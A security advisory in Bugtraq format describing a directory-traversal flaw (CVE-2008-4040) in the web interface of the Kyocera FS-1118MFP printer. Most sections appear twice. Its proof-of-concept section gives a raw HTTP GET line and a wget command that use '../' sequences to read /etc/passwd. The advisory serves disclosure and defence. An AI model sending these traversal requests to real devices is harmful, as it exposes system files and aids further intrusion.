Kyocera Command Center Directory Traversal Vulnerability
BID:30971
Info
Kyocera Command Center Directory Traversal Vulnerability
| Bugtraq ID: | 30971 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4040 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 02 2008 12:00AM |
| Updated: | Apr 16 2015 05:54PM |
| Credit: | Francesco Tornieri |
| Vulnerable: |
Kyocera FS-1118MFP 0 |
| Not Vulnerable: | |
Discussion
Kyocera Command Center Directory Traversal Vulnerability
Kyocera Command Center is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Kyocera Command Center included with the FS-1118MFP printer is vulnerable; other versions may also be affected.
Kyocera Command Center is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Kyocera Command Center included with the FS-1118MFP printer is vulnerable; other versions may also be affected.
Exploit / POC
Kyocera Command Center Directory Traversal Vulnerability
An attacker can exploit this issue via readily available tools.
The following examples are available:
GET /../../../../../../../../../etc/passwd HTTP/1.0
wget http://www.example.com/../../../../../../../../../etc/passwd
An attacker can exploit this issue via readily available tools.
The following examples are available:
GET /../../../../../../../../../etc/passwd HTTP/1.0
wget http://www.example.com/../../../../../../../../../etc/passwd
Solution / Fix
Kyocera Command Center Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Kyocera Command Center Directory Traversal Vulnerability
References:
References:
- Kyocera Command Center Directory Traversal Vulnerability (Francesco Tornieri)
- Vendor Homepage (Kyocera)